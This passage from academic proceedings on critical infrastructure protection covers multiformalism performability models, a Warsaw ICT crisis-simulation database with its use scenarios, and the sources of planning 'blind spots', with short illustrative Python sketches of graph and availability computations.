– Continuous Time Markov Chains for the Internal Recovery Model;
– Bayesian Networks for the Internal Failure Model.
[Figure 3: (a) a GSPN performability model combining a queue (arrival rate λ, service rate μ) with a two-state AVAILABLE/UNAVAILABLE CTMC with transition rates 1/MTBF and 1/MTTR; (b) a multiformalism model with a capacity model (QN), a recovery model (CTMC) and a failure model (BN).]
Fig. 3. Basic performability models using (a) GSPN or (b) multiformalism (QN+CTMC+BN)
In general, a "performability module" is needed for each service provided, considering each significant (failure, recovery strategy) pair. The use of BN allows considering more failure modes and both random faults and security threats, e.g. strategic disruptive attacks possibly involving more than one infrastructure and obtained by the simultaneous exploitation of flaws. Referring to Fig. 3b, upward connections are required to model:
– BN → CTMC: the effect of failures on the infrastructure operating modes (e.g. fully operational, minor failure, service failure, immobilizing failure, etc.);
– CTMC → QN: the effect of the operating mode on the infrastructure capacity (e.g. reduction by X%).
Downward connections are instead required to account for:
– QN → CTMC: infrastructure overstress (obtained by reporting the effect of server occupation to the lower layer);
– CTMC → BN: imperfect recovery (propagation of repair faults to the failure model) and overstress (decrease of the Mean Time Between Failures, MTBF).
Multiformalism performability model interconnection is possible by superposition of QNs belonging to different infrastructure models, according to service dependence. Once the models of all infrastructures have been instantiated and interconnected, quantitative attributes of the overall multiformalism model can be evaluated in the OsMoSys framework using a suitable solving process. For instance, the availability of a single infrastructure with respect to a certain failure mode can be evaluated considering the contribution of all the other interacting infrastructures. A numerical sketch of such a composition is given below.
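As a numerical illustration of this composition (our own minimal sketch, not the OsMoSys solving process; the function name, parameter values and the fixed-point coupling are simplifying assumptions), the following Python code couples a two-state availability CTMC with an M/M/1-style capacity model: steady-state availability scales the effective service rate, while queue utilisation feeds back as an overstress factor that shortens the MTBF.

```python
# Minimal sketch (hypothetical): a two-state availability CTMC coupled with an
# M/M/1-style queue, iterated to a fixed point so that queue utilisation
# (overstress) feeds back into the failure rate.

def performability(arrival_rate, service_rate, mtbf, mttr,
                   overstress_gain=0.5, iterations=50):
    failure_rate = 1.0 / mtbf
    repair_rate = 1.0 / mttr
    utilisation = 0.0
    for _ in range(iterations):
        # overstress: higher utilisation shortens the effective MTBF
        eff_failure_rate = failure_rate * (1.0 + overstress_gain * utilisation)
        # steady-state availability of the two-state CTMC
        availability = repair_rate / (repair_rate + eff_failure_rate)
        # capacity model: availability scales the effective service rate
        eff_service = availability * service_rate
        utilisation = min(arrival_rate / eff_service, 1.0)
    return availability, utilisation

a, u = performability(arrival_rate=8.0, service_rate=12.0,
                      mtbf=1000.0, mttr=10.0)
print(f"availability = {a:.4f}, utilisation = {u:.3f}")
```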
4
Conclusions and Future Work
In this paper we have proposed a multiformalism approach to the modeling of CI, with the aim of integrating heterogeneous (existing) models and possibly providing analytic evaluation of dependability attributes. This preliminary study also shows that multiformalism approaches fit well with multilevel hierarchical modeling paradigms. We are presently working on a complete case-study application of the methodology. The use of existing models could be limited by infrastructure operators for confidentiality reasons. To overcome this, models can be run in a distributed simulation environment exposing only their public interfaces, with the exchange of information needed to make them interact managed by the OsMoSys workflow engine.
References
1. de Lara, J., Guerra, E., Vangheluwe, H.: Meta-Modelling, Graph Transformation and Model Checking for the Analysis of Hybrid Systems. In: Pfaltz, J.L., Nagl, M., Böhlen, B. (eds.) AGTIVE 2003. LNCS, vol. 3062, pp. 292–298. Springer, Heidelberg (2004)
2. Di Lorenzo, G., Flammini, F., Iacono, M., Marrone, S., Moscato, F., Vittorini, V.: The software architecture of the OsMoSys multisolution framework. In: Proc. 2nd Intl. Conf. on Perf. Evaluation Meth. & Tools, VALUETOOLS 2007, pp. 1–10 (2007)
3. Ezell, B., Farr, J., Wiese, I.: Infrastructure Risk Analysis Model. Journal of Infrastructure Systems 6(3), 114–117 (2000)
4. Flammini, F., Iacono, M., Marrone, S., Mazzocca, N.: Using Repairable Fault Trees for the evaluation of design choices for critical repairable systems. In: Proceedings of the 9th IEEE International Symposium on High Assurance Systems Engineering (HASE 2005), Heidelberg, Germany, pp. 163–172 (2005)
5. Flammini, F., Marrone, S., Mazzocca, N., Vittorini, V.: Modelling Structural Reliability Aspects of ERTMS/ETCS by Fault Trees and Bayesian Networks. In: Proc. of the European Safety & Reliability Conference, ESREL 2006 (2006)
6. Gössler, G., Sifakis, J.: Composition for Component-Based Modeling. In: de Boer, F.S., Bonsangue, M.M., Graf, S., de Roever, W.-P. (eds.) FMCO 2002. LNCS, vol. 2852, pp. 443–466. Springer, Heidelberg (2003)
7. Mengting, Y., Chao, Y.: Model Checking Multi-agent Systems. In: Proc. of Intl. Conf. on Service Systems and Service Management, pp. 1–5 (2007)
8. Meyer, J.F.: Performability: a retrospective and some pointers to the future. Performance Evaluation 14(3&4), 139–156 (1992)
9. Nicol, D.M., Sanders, W.H., Trivedi, K.S.: Model-based evaluation: from dependability to security. IEEE Transactions on Dependable and Secure Computing 1(1), 48–65 (2004)
10. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research. INL Technical Document INL/EXT-06-11464 (2006)
11. Sanders, W.H.: Integrated Frameworks for Multi-Level and Multi-Formalism Modeling. In: Proc. of the 8th Intl. Workshop on Petri Nets and Performance Models, p. 2 (1999)
Simulation of Critical ICT Infrastructure for Municipal Crisis Management

Adam Kozakiewicz, Anna Felkner, and Tomasz Jordan Kruk

NASK – Research and Academic Computer Network, Wąwozowa 18, 02-796 Warsaw, Poland
Institute of Control and Computation Engineering, Warsaw University of Technology, Nowowiejska 15/19, 00-665 Warsaw, Poland

Abstract. Crisis management benefits tremendously from simulation, especially during planning and testing. At the same time, an often overlooked aspect of crisis management is the key role of telecommunication. This paper describes the work done at NASK with the goal of implementing a simulator of the consequences of threats to the ICT (Information and Communication Technology) infrastructure, as part of a large simulation environment for crisis management in a large urban area (specifically, the Warsaw agglomeration).
1
Project Background
Simulation is a very useful tool for crisis management. It can be used in the planning phase, to make sure that the proposed actions will be effective. In the training phase it can help verify the ability of decision makers to control disaster response. Finally, during an actual crisis, it acts as a visualization tool for the observed threats, a prediction mechanism suggesting the probable development of the crisis, and a testing environment enabling comparison of different strategies. In response to this need, a consortium of Polish research institutes was formed to research crisis management problems, including the preparation of a multi-aspect simulation environment for the Warsaw agglomeration. The simulation should include all kinds of threats: fires, floods, chemical or nuclear pollution, terrorism, military threats, etc. Institutes from the respective fields were invited, and work started as a research grant from the Ministry of Science and Higher Education, "Models of threats to agglomeration and crisis management system – case study for the Capital City of Warsaw", coordinated by the Military University of Technology in Warsaw. NASK, together with the National Institute of Telecommunications, was tasked with researching the often overlooked problem of critical ICT (Information and Communication Technology) infrastructure. It is far too often assumed that, e.g., communication between command and units will be available during a crisis. Even if this aspect could be safely ignored, a modern city cannot function properly if its telecommunication infrastructure is badly damaged, or if systems used in the everyday functioning of the municipal administration are offline – such outages generate costs and make restoring the normal situation after a crisis more complicated.
While usually less important than direct threats to human lives, these problems should not be completely ignored. One of the tasks handled by NASK was to prepare a concept for a simulator of the consequences of threats to the ICT infrastructure. This paper presents an overview of the results. The observations forming the basis for the project were made in Warsaw, but the same comments hold more or less true for many cities. The goal of the project was to build adaptable tools which could be used in any city after minor changes and, of course, with new data.
2
Problem Description
The main task of the simulation is to identify the consequences of damage to the ICT infrastructure by different threats. The problem is simplified by the fact that the cause of the damage is not really important – whether a router burned in a fire or sank during a flood does not change the basic fact that the router is down and alternative routes must be found. For this reason, the input from other parts of the multi-simulator includes only basic information about threats, mostly limited to the coordinates of the endangered area. Unfortunately, the ICT sector is often completely overlooked in crisis management. The consequences of damage to this infrastructure are not considered critical for the functioning of a city. At the same time, administration of the most important parts of this infrastructure is often fragmented, with little or no coordination between operators. In one example, two operators were selected to provide a link between two points, with the load distributed between the two connections. In theory this provides redundancy, enabling a degraded but uninterrupted service in case of a failure in one of the networks. In practice, the client was unable to find out that both providers use fibers in the same duct. Many networks are built ad hoc, using questionable engineering practices. At the same time, more and more important services are required. The cost of building a full-scale dedicated network is rather prohibitive when sufficient capacity can be provided by existing commercial operators, unfortunately not very interested in coordinated disaster prevention. Such outsourcing makes sense in a business setting, but for some administrative tasks in a municipality a better level of preparation for potential disasters is usually expected. In effect, the infrastructure is quite vulnerable to all kinds of physical threats. This situation could be improved by collecting the available information and testing the infrastructure through extensive simulation to locate weak spots. This approach would be useful both for the city as a network user and for the commercial providers. Note that, while at the state level the ICT infrastructure is already considered crucial (see e.g. [1], [2]), at the municipal level this belief is not as widespread. The ICT infrastructure of an agglomeration consists of cables, network nodes (routers, switches), wireless antennae, computers, etc., as well as the information systems actually provided by the computers. To deal with that, we assume that unimportant information, e.g. details about local networks in less critical institutions, should not be entered into the system. The rest of the information,
potentially useful, is further prioritized by means of a "criticality factor", which enables us to differentiate critical systems and links from those whose functioning during a crisis is only preferred, and from the rest, not important enough to warrant extra attention during an emergency. Of course, this factor is not as simple as it might seem: for example, a low-speed backup link, basically useless, becomes critical if it is on the only functioning route between two critical systems which need to communicate to function. The above paragraphs present all the elements that must be incorporated in the design of a threat consequences simulator for ICT infrastructure:
– a database of the city's most important computers, networks and communications equipment, of the important systems running on this infrastructure, and of the key relationships between all elements,
– identification of critical elements of the infrastructure,
– collection of information about external threats,
– computation of the effects of these threats on the graph of the network, focusing on the critical elements.
All of these aspects are included in the presented solution. Note that only physical threats are mentioned. In fact, there is also a different kind of threat to the ICT infrastructure – internal threats, such as malware. This aspect was also analyzed as a part of the project. In this paper, however, we focus on the external threat consequences simulator.
3
System Architecture
The simulator is not a standalone tool. It was designed to be used as a part of the multi-threat simulator, communicating with the others and using the system's main GUI as its user interface. Thanks to the well-specified interfaces, this does not preclude integrating it into other products or even transforming it into a standalone application by implementing a simple user interface. This fact enforces several design decisions. First of all, due to the specification of the multi-simulator, the interface of the ICT simulator is specified as web services. This corresponds well to the selected approach to feature specification, which focuses on use scenarios; the scenarios can be the basis for the API specification. The other important feature of the multi-simulator is its user interface, based on a digital map of the city. This digital map is not only the interface, but also an important source of data for the individual simulators. It is assumed that the ICT simulator will in fact hold all the data necessary for its functioning locally (for efficiency reasons), but a large part of that data is actually supplied by the map software at the start of a new simulation. Some kinds of information may be too task-specific to be stored in the central system, so the design is a hybrid one. A positive side effect is that the simulator can actually function very well without the digital map module, if all the necessary data can be loaded in a different way. The use scenarios, described later, require that the database store (and collect from the digital map, if possible) the following data:
Simulation of Critical ICT Infrastructure for Municipal Crisis Management
347
– the network topology,
– positions of nodes and links in the network,
– positions of essential systems, which provide services,
– ranges of wireless communications,
– criticality levels,
– connections between nodes and links, defining the topology of the system,
– software and services – depending on the relevance of the offered services,
– tunnels – definitions of pairs of objects which need to communicate (in any manner), defined when the connectivity between those objects is itself critical, but the route is not,
– dependencies (whether one object is necessary for the functioning of another).
A database for this task has already been designed and, with the use scenarios and algorithms resulting from them, forms the engine of the simulator. The basic structure of the database is presented in Fig. 1. Note that the table names were translated into English for this paper.
[Figure 1 database diagram: simulation management tables (simulation, simulation_has_states, simulation_logs, simulator_logs, state, state_has_objects), core tables (object, relation, location, coordinates) and object type-specific tables (type_1_services, type_2_software, type_3_hardware, type_4_link, type_5_network, type_6_institution, type_7_threat, type_8_group).]
Fig. 1. Structure of the database for the ICT simulator
The properties of hardware and software components are stored in the database prepared for this project. The components are described as generic objects, with type-specific information stored separately. Objects may have defined locations. In the case of node hardware (computers, switches, etc.) these are simply coordinates, while links are defined as ellipsoids. The reason for this is that the precise location of links can in many cases be difficult to obtain – this was a big problem in the preparatory phase of the project. The ellipsoids allow at least an estimation of the probability of a link being damaged by a disaster near its estimated path; a simple geometric sketch of this test is given below. The tables defined for storing locations are also used to hold wireless ranges.
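As a purely illustrative sketch (ours, in 2-D for simplicity, not the project's code), the damage test for a link stored this way can be as simple as checking whether a threat point falls inside the ellipse whose foci are the link's endpoints:

```python
# Minimal sketch (hypothetical): a link is stored as an ellipse around its
# estimated path; a threat point "hits" the link if it falls inside the
# ellipse, i.e. the sum of distances to the two foci is within the major axis.
import math

def point_in_ellipse(px, py, f1, f2, major_axis):
    """True if (px, py) lies inside the ellipse with foci f1, f2 (the link's
    endpoints) and the given major-axis length (>= distance between foci)."""
    d = math.dist((px, py), f1) + math.dist((px, py), f2)
    return d <= major_axis

# link between two nodes, with 20% slack for route uncertainty
a, b = (0.0, 0.0), (10.0, 0.0)
slack = 1.2 * math.dist(a, b)
print(point_in_ellipse(5.0, 2.0, a, b, slack))   # True: threat near the path
print(point_in_ellipse(5.0, 6.0, a, b, slack))   # False: far from the path
```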
The objects in the database are organized using object groups. The basic role of a group is to define sets of objects which are important as a whole, but there is also a special kind of group used to store the tunnels mentioned above. All groups are bound together by a special kind of relation, described later. The defined kinds of groups are as follows:
– If all elements of a group are essential to carrying out key tasks, systems can be joined into a complementary group. The criticality of the elements of the group should be at least equal to the criticality of the entire group; where this does not hold, the group's criticality is taken to be that of its most critical element.
– Systems, but also links and nodes, can be joined into replacement groups, most often into pairs. In such a case the criticality of the group is equal to the lowest criticality among its elements. This type of group has an additional property, the maximum switching time, which determines how long the resource may be completely unavailable after the primary resource malfunctions.
– A tunnel group can be assembled from pairs of resources which need to have a connection assured. This connection can be provided in any manner. Such a tunnel has its own criticality, not related to the criticality of the connected objects (but usually not higher than the lowest of those).
All groups are themselves objects, so they can be members of other groups as well. This property can be used to create complex groups: for example, if a service can be provided by two different resource kits, it can be described as a replacement group consisting of two complementary groups (see the sketch below). As mentioned before, groups are defined by a relation. There are several types of relations:
– a topological relation stores the connections between nodes and links, defining the structure of the network as a graph;
– a dependency relation stores the dependencies between objects;
– an inclusion relation is used to assign members to groups.
All of these relations are practically the same from the point of view of the database. The objects (of several types, including groups), their type-specific counterparts, location information and relations are the main part of the database. Other tables are necessary from the simulation point of view and are used to describe the passage of time and to store simulation run-specific information.
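The criticality rules above can be captured in a few lines. The following Python sketch is hypothetical (the project's actual engine is not shown in the paper): complementary groups propagate the maximum criticality, replacement groups the minimum, and groups nest freely because groups are themselves objects.

```python
# Minimal sketch (hypothetical names): effective criticality of nested groups.
# A complementary group is at least as critical as its most critical member;
# a replacement (redundancy) group is only as critical as its weakest member.
from dataclasses import dataclass, field

@dataclass
class Resource:
    name: str
    criticality: int            # e.g. 0 (unimportant) .. 3 (critical)

@dataclass
class Group:
    name: str
    kind: str                   # "complementary" or "replacement"
    criticality: int            # the group's own assigned criticality
    members: list = field(default_factory=list)   # Resources or Groups

def effective_criticality(obj):
    if isinstance(obj, Resource):
        return obj.criticality
    member_crit = [effective_criticality(m) for m in obj.members]
    if obj.kind == "complementary":
        # every member is essential: the group is at least as critical
        # as its most critical member
        return max([obj.criticality] + member_crit)
    # replacement: redundancy caps criticality at the weakest member
    return min(member_crit)

# a service provided by either of two resource kits: a replacement group
# consisting of two complementary groups
kit_a = Group("kit A", "complementary", 2,
              [Resource("server A", 3), Resource("uplink A", 2)])
kit_b = Group("kit B", "complementary", 2,
              [Resource("server B", 1), Resource("uplink B", 1)])
service = Group("service", "replacement", 0, [kit_a, kit_b])
print(effective_criticality(service))   # -> 2: kit B caps the redundancy
```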
4
Use Scenarios
Use scenarios are the most important part of the functional specification. They are meant to be an exhaustive list of questions and tasks for the simulator. It is of course possible that new scenarios will be added in the future, but the currently planned list is sufficient for the functioning of the system.
The scenarios were generated during several months of discussions, starting early in the preparation phase of the project. In the design phase they are converted into actual algorithms, with common parts extracted into separate sub-algorithms. These algorithms will then be assigned to web services and implemented. Since the team took care to specify the scenarios such that they are implementable, in most cases a general idea of an algorithm is already present and is simply being formally specified. New algorithms may be proposed if the original ideas prove inefficient. The scenarios to be accomplished by the simulator were divided into five groups: helper scenarios, simple scenarios, location scenarios, graph and group scenarios, and variant scenarios. These groups are described in the following sections.
4.1
Helper Scenarios
Helper scenarios do not perform any simulations. They are used only in preparation for future simulations. This group includes the following scenarios:
– Modify (add/remove/change) an object or a list of objects (types: service, software, network device, link, network, institution).
– Connect network devices with a link.
– Modify a system (a system is a network device, software, services and the relations between them).
– Modify a group.
– Add object(s) to a group.
– Add/remove a relation.
– Change the criticality of an object. The criticality of a resource should be understood as its importance (rank) relative to other resources.
– Move a network device with all its bindings.
– Define a new threat area and give it a name.
– Change the range of a named threat. This scenario allows modification of an earlier defined area; the changes can be:
• redefinition: a new shape of the area is given,
• additive modification: new subareas to add (or remove) are given,
• morphing modification: a list of changes of subarea coordinates is given,
• deletion: an existing threat is eliminated.
4.2
Simple Scenarios
The scenarios in this group do not require any computation and are used for data output from the system:
– What is the inherent criticality of an object? This scenario is used to show the criticality assigned to a resource or group directly in its database record.
– Which connections are essential to carry out a crisis management procedure? This scenario determines a procedure's requirements. A procedure, from the point of view of the simulator, is basically just a group of systems, tunnels and links without which the communication and management specified in the official procedure cannot be assured.
4.3
Location Scenarios
These scenarios check whether nodes and systems belong to a static threat area:
– Which critical resources are threatened?
– Which critical resources are available despite the threat? This scenario is especially useful if the disaster causes a total collapse of the ICT system, when the list of operational systems is actually much shorter than the list of damages.
– Is a resource/area vulnerable to a threat?
4.4
Group and Graph Scenarios
In these scenarios the topology of the network has to be analyzed, which includes finding paths and processing the structure of the network. Note that the scenarios concerning groups can also be used to ask about the groups to which a given resource belongs. The group includes the following scenarios:
– What is the static level of criticality of a resource/object?
– What is the level of criticality of a group? These two scenarios determine a pessimistic estimation of the resource's significance, taking into account its role in groups.
– How critical is a resource/area?
– What is the criticality of the elements of a group?
– Which resources are critical at the moment? This scenario identifies (in the whole system or in a given area) the resources with criticality above a given threshold.
– Is a connection between two points/nodes possible?
– Is the realization of a given crisis management procedure (or of another group) possible?
– Does a given service work?
– Where is the service located?
– Is a given service available from a certain point?
– Which crisis management procedures are possible/impossible to carry out in the current situation?
– Find a functioning path between two given points (see the sketch below).
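As an illustration of the computation behind the last scenario in the list (a sketch of ours, not the simulator's actual algorithm), a breadth-first search over the network graph that treats damaged nodes as removed suffices for the basic case:

```python
# Minimal sketch (hypothetical): find a functioning path between two nodes,
# treating damaged nodes as removed from the network graph.
from collections import deque

def functioning_path(graph, damaged, src, dst):
    """Breadth-first search over `graph` (node -> list of neighbours),
    ignoring any node in the `damaged` set; returns a path or None."""
    if src in damaged or dst in damaged:
        return None
    parent = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:       # walk back to the source
                path.append(node)
                node = parent[node]
            return path[::-1]
        for nxt in graph.get(node, []):
            if nxt not in parent and nxt not in damaged:
                parent[nxt] = node
                queue.append(nxt)
    return None

graph = {"A": ["B", "C"], "B": ["A", "D"], "C": ["A", "D"], "D": ["B", "C"]}
print(functioning_path(graph, damaged={"B"}, src="A", dst="D"))
# -> ['A', 'C', 'D']
```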
4.5
Variant Scenarios
The scenarios in this group have to consider the system state in at least two different simulation states and compare them. The following scenarios belong to this group:
– What consequences for connectivity would occur if a resource (or list of resources) were repaired/damaged in the context of the existing threats?
– What consequences for the criticality of resources would occur if a resource (or list of resources) were repaired/damaged in the context of the existing threats?
– Which resources should be protected during the changing crisis situation?
– Prioritize the repair/replacement of damaged resources.
5
Further Development
The ICT threat consequences simulator is already past the basic design phase. The original project only included a concept of the simulator, but the authors are continuing with the development and the implementation will be completed. After analysis of the documents made available by the potential users ([3], [4], [5], [7], later [6] and others), the functional specification for the project is already complete. The technical specification is also quite advanced: the architecture, database structure, choice of tools, etc. are complete; the only unfinished element of the specification is the design of some of the algorithms implementing the use scenarios. Until these are ready, the specification of the web services is also considered volatile. As soon as this phase is completed, implementation will start.
References
1. Blattner, M.: Quo vadis? IT security as common task of state and economy. ECN European CIIP Newsletter 4(1), 10–13 (2008)
2. Narich, R.: Protection of Critical Infrastructure: Importance, Complexity, Results. ECN European CIIP Newsletter 2(1), 7–9 (2006)
3. Wewnętrzny Regulamin Działania Biura Bezpieczeństwa i Zarządzania Kryzysowego m. st. Warszawy, an operational statute (2005)
4. Plan Reagowania Kryzysowego m. st. Warszawy, incomplete draft, a disaster response plan (2006)
5. Tymczasowy Regulamin Organizacyjny Urzędu Miasta Stołecznego Warszawy, an organizational statute (2006)
6. Regulamin Organizacyjny Urzędu Miasta Stołecznego Warszawy, an organizational statute (2007)
7. Regulamin bieżących prac Zespołu Reagowania Kryzysowego m. st. Warszawy oraz działań w sytuacjach zagrożeń katastrofą naturalną lub awarią techniczną noszącą znamiona klęski żywiołowej, a lower-level operational statute and disaster response plan (2004)
An Ontology-Based Approach to Blind Spot Revelation in Critical Infrastructure Protection Planning

Joshua Blackwell, William J. Tolone, Seok-Won Lee, Wei-Ning Xiang, and Lydia Marsh

The University of North Carolina at Charlotte, 9201 University City Blvd, Charlotte, NC 28223-0001, USA
Abstract. One widely perceived yet poorly understood phenomenon in the practice of critical infrastructure protection is that of blind spots. These are certain aspects of the interrelationships among different critical infrastructure systems (CI systems) that could trigger catastrophe across CI systems but are concealed from planners and discovered only in the aftermath of a crisis. In this paper, we discuss the sources of blind spots and explore the feasibility of various techniques to help reveal them.
1
Introduction
August 14th, 2003 saw the Northeastern blackout, a massive power blackout in the northeastern United States and southeastern Canada. The cascading events that resulted in failures in other infrastructure systems (telecommunication services, aviation, and transit) affected the lives of over 50 million people in both countries [6,7]. The cause of the blackout, revealed only in hindsight, was a surprise beyond anyone's imagination: a trivial incident in Parma, Ohio, a suburb of Cleveland, where untrimmed, overgrown trees severed one section of a high-voltage power transmission line [6,7]. Surprises of this kind and the resulting failures are manifestations of blind spots, a widely perceived yet poorly understood phenomenon in the practice of critical infrastructure protection (CIP, hereafter). In this paper, we explore a set of questions instrumental to the revelation of blind spots. That is, what exactly is a blind spot in CIP? Where does it come from? What impacts does it have on CIP practice? To what extent, if ever, can a blind spot be revealed or even projected before a crisis? What role(s) can information technology play in revealing blind spots? We propose the use of information technologies to facilitate the exploration of blind spots.
2
What Is a Blind Spot?
One useful analogy can be drawn between a car driver and a CIP planner. A blind spot is the area the driver cannot see through the mirrors.
Fig. 1. A driver’s blind spot [1]
As shown in Figure 1, there are two areas in a driver's field of vision that are not visible. If the driver were to turn and look to the side, the blind spot would be revealed, and, more importantly, whatever is in the blind spot, perhaps another vehicle, would be noticed and avoided if deemed dangerous. Another type of blind spot exists in the forward vision as well. Perceptual or cognitive blind spots occur in the forward vision when drivers become habituated to what they usually see. Their focus of attention and cognitive thought process prevent them from recognizing potential dangers in plain sight. For example, the driver may fail to brake quickly enough to avoid a collision due to poor depth perception. This aspect is not depicted in the illustration but must be recognized. Similarly, in CIP planning, blind spots refer to certain aspects of the interrelationships among different critical infrastructures (CI systems, hereafter) that could trigger catastrophe across CI systems but are concealed from CIP planners, and discovered only in the aftermath of a crisis. The 2003 blackout is one of many examples of blind spots. Yet not all of the interrelationships among CI systems are blind spots. In a recent study, McNally et al. [9] examined the interrelationships among different CI systems (that is, CI interdependencies) under a quadruple framework. This study demonstrates an asymmetry in the accumulated knowledge about, and attention toward, CI interdependencies across the four quadrants of their framework. More specifically, (1) knowledge is generally available about CI interdependencies among CI systems that are directly connected by function and geographically proximate to one another (quadrant A); (2) little attention has been paid to the CI interdependencies among CI systems indirectly connected by function, regardless of their geographic location, i.e., proximate or distant (quadrants B and C); (3) although knowledge is readily available about CI interdependencies among CI systems that are directly connected by function but geographically distant (quadrant D), the segmented nature of CI service delivery often constitutes a "corporate firewall" that prevents knowledge exchange and communication across different CI systems about potential vulnerabilities caused by the CI interdependencies in the other quadrants (that is, A, B, and C). Clearly, under this quadruple framework, CI interdependencies in quadrants B and C are more likely to become
blind spots than those in quadrant D, and especially those in quadrant A. In the next section, we extend the work of McNally et al. to explore the sources of blind spots in CIP. That is, where do blind spots come from?
3
Sources of Blind Spots in CIP
Among possible sources of blind spots in the practice of critical infrastructure protection are complexity; imperfections in information, heuristics, and tools; and the lack of cross-domain knowledge. 3.1
Complexity of CI Systems
Complexity in CI systems stems from at least three sources: CI interdependencies, spatial and temporal variations, and the scale dependence of observation. Characterized by McNally et al.'s four-quadrant framework, CI interdependencies amongst CI objects can span CI systems, i.e., inter-domain dependencies, or occur within CI systems, i.e., intra-domain dependencies. CI interdependencies can also be spatially proximate or distant. Furthermore, there are emergent features that arise when looking at a system of CIs that are not present when examining an individual CI system [9]. For example, HVAC systems depend on electric power to provide cooling; if power is lost then, although the HVAC systems are sound, they can no longer operate. Though a simple example, this effect is only recognized from a system-of-systems perspective. Given the complexity of a system of CIs and the general level of awareness of CI interdependencies reported by McNally et al., it is unlikely that a CIP planner will properly understand all relevant CI interdependencies. Furthermore, spatial and temporal variations occur among CI systems. CI systems are located, in part, based on natural and unique environmental characteristics, which impacts CI interdependencies. Therefore, our understanding of CI interdependencies is not necessarily transferable from one region to the next. In addition, our understanding may also be temporally dependent, as CI behavior, and the subsequent interdependencies, can change over time (e.g., time of day, time of year, etc.). Scale dependence of observation refers to the level of detail represented. Due to their inherent complexity, CI systems are often examined or observed at various scales of analysis. CI interdependencies are naturally associated with these scales of analysis. Examining CI systems at a particular scale necessarily obscures both detail and context. Furthermore, our understanding of CI interdependencies is scale-dependent: assessing geographic proximity depends on scale; assessing direct vs. indirect functional dependence also depends on scale. Consequently, macro-scale and micro-scale CI interdependencies can be occluded by the scale of observation. Likewise, CI interdependencies may be misunderstood due to the scale of observation.
3.2
Imperfect Information
Much of the information needed for CIP planning is not within the public domain. It is estimated that 85 percent of all CI data in the U.S. is maintained by the private sector. Owing to their confidential, proprietary and business-sensitive nature, these data are not accessible to the public [10]. In the United States, the Protected Critical Infrastructure Program under the U.S. Department of Homeland Security, with provisions from the Critical Infrastructure Information Act, only encourages private-sector data sources to submit information/knowledge/data voluntarily to the U.S. federal government. Nevertheless, even if the private sector were to comply, the data are often large, extensive, even entrapping [11].
3.3
Imperfect Heuristics
Human thinking is affected by several common effects that set limits on our cognitive abilities, and these effects can be a source of blind spots. The availability heuristic occurs when a human uses the most available pieces of information to assess the frequency of an object class or the probability of an event [13]. Salience also contributes to the mind's ability to retrieve available information: if one were to witness an event rather than just hear about it, one would be more likely to remember and retrieve it as a process that occurs [13]. People are also biased when it comes to assessing situations they have not seen before. Their bias of imaginability leads them to generate an answer according to some rule if there are no known instances to reference [13]. Risk can be evaluated incorrectly, or not seen at all, if a person cannot fathom the type of risk that exists in a situation given the rules that the person already has in place. People start from a value point that is known and then adjust it to fit the situation being evaluated; however, the result is always tied to the initial value point. This is known as the anchoring effect [13]. When the adjustment from this value point is not sufficient to lead to an accurate conclusion about the events or objects in question, a misconception remains and an error can occur [13]. It is important to understand the limitations of these heuristics so that judgment and decision making in critical situations can improve.
3.4
Imperfect Tools
Modelers of CI systems should consider the capabilities and limitations of the tools that they use to understand CI systems. Often, it is possible for tools to under-represent or, even worse, misrepresent critical information necessary to understand real-world CI phenomena. For example, a geographic information system is capable of displaying CI systems in visual displays with colors representing functionality and type. It can easily display spatial proximity at different scales of observation. However, it cannot easily display the functional connectedness or the nature of the functional relationships amongst those objects. On the other hand, ontological modeling tools, which can easily represent functional relationships, do not effectively depict spatial proximity.
3.5
Lack of Cross-Domain Knowledge
As society and its organizations become more specialized, human knowledge tends to be more domain-specific. People who have cross-domain knowledge are usually in senior positions and less accessible. This is especially the case in organizations that operate and/or manage CI systems, due to the security and business-sensitivity concerns in the arena of CIP. The shortage of subject matter experts with cross-domain knowledge further contributes to the problem of blind spots. It should be noted that the above discussion of possible sources of blind spots in CIP is by no means exhaustive. An in-depth investigation that systematically studies the phenomena is beyond the scope of this paper. However, in the next section we discuss the potential role of information technology and modeling in revealing blind spots.
4
Information Technologies, Modeling and Blind Spot Revelation
It is well established that driver blind spots can be revealed by adjusting the rear-view mirrors or incorporating additional mirrors, as well as by the protocol of "looking back over your shoulder". In CIP planning, we claim that blind spots can be revealed through the innovative use of information technology, modeling, and associated operational protocols. In this section, we highlight several general approaches to blind spot revelation that show promise. To facilitate blind spot revelation, it is necessary to articulate the various methods and tools together under an overarching framework. We propose a spatial decision support system (SDSS) to serve this purpose. More specifically, by combining the strengths of an ontology-based knowledge engine and GIS, cross-domain knowledge solicited from human experts [11] can be represented, visualized, and further applied to reasoning and modeling; by coupling several methods in a model base, the SDSS provides CIP planners with tools for revealing blind spots and preparing for disaster management. These methods are briefly discussed below.
4.1
Abstraction
Abstraction can be used to assist in blind spot revelation. In order for CIP planners to further understand the sources of blind spots within their CI systems, it is necessary to assess those CI systems at different levels of abstraction [8,16]. This will promote a learning cycle in which domain assessment leads to an enrichment of the domain data, which, in turn, will necessitate further domain assessment. Through abstraction methods enabled by an SDSS, planners will better understand where the sources of blind spots originate and determine whether the blind spots lie within the planner's control or outside it, in a larger world domain.
4.2 CI System Specification
McNally et al. [9] describe a method for the specification of individual CI systems as well as a system of CIs. A system of CIs is a collective group of CI systems that provides commodities integral to maintaining normal operations for a given region. There are four iterative steps to this method of CI system specification. (1) Identify the CI systems: identify the CIs, their boundaries and structures. (2) Specify the CI systems: place all CI objects into the model; identify and specify the properties and characteristics of each object; specify inherent functionalities and model relationships between objects in the same system (intra-domain interdependencies). (3) Specify the system of CIs: define cross-domain interdependencies amongst objects from different CI systems. (4) Verification and validation: evaluate and refine the model to direct future iterations of these steps. Integrating support for such methods into an SDSS can facilitate the discovery of blind spots by CIP planners; a minimal data-model sketch of the four steps is given below.
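The following Python sketch is a hypothetical data model for the four steps; it is not the information system of McNally et al. [9], and every name in it is an assumption made for illustration.

```python
# Illustrative data model for the four-step CI specification method.
from dataclasses import dataclass, field


@dataclass
class CISystem:
    domain: str                                   # step 1: identified CI
    objects: dict = field(default_factory=dict)   # step 2: objects/properties
    intra: set = field(default_factory=set)       # intra-domain dependencies

    def specify(self, name: str, **properties):
        """Step 2: place an object and its properties into the model."""
        self.objects[name] = properties

    def link(self, src: str, dst: str):
        """Step 2: intra-domain dependency (src depends on dst)."""
        self.intra.add((src, dst))


@dataclass
class SystemOfCIs:
    systems: dict = field(default_factory=dict)
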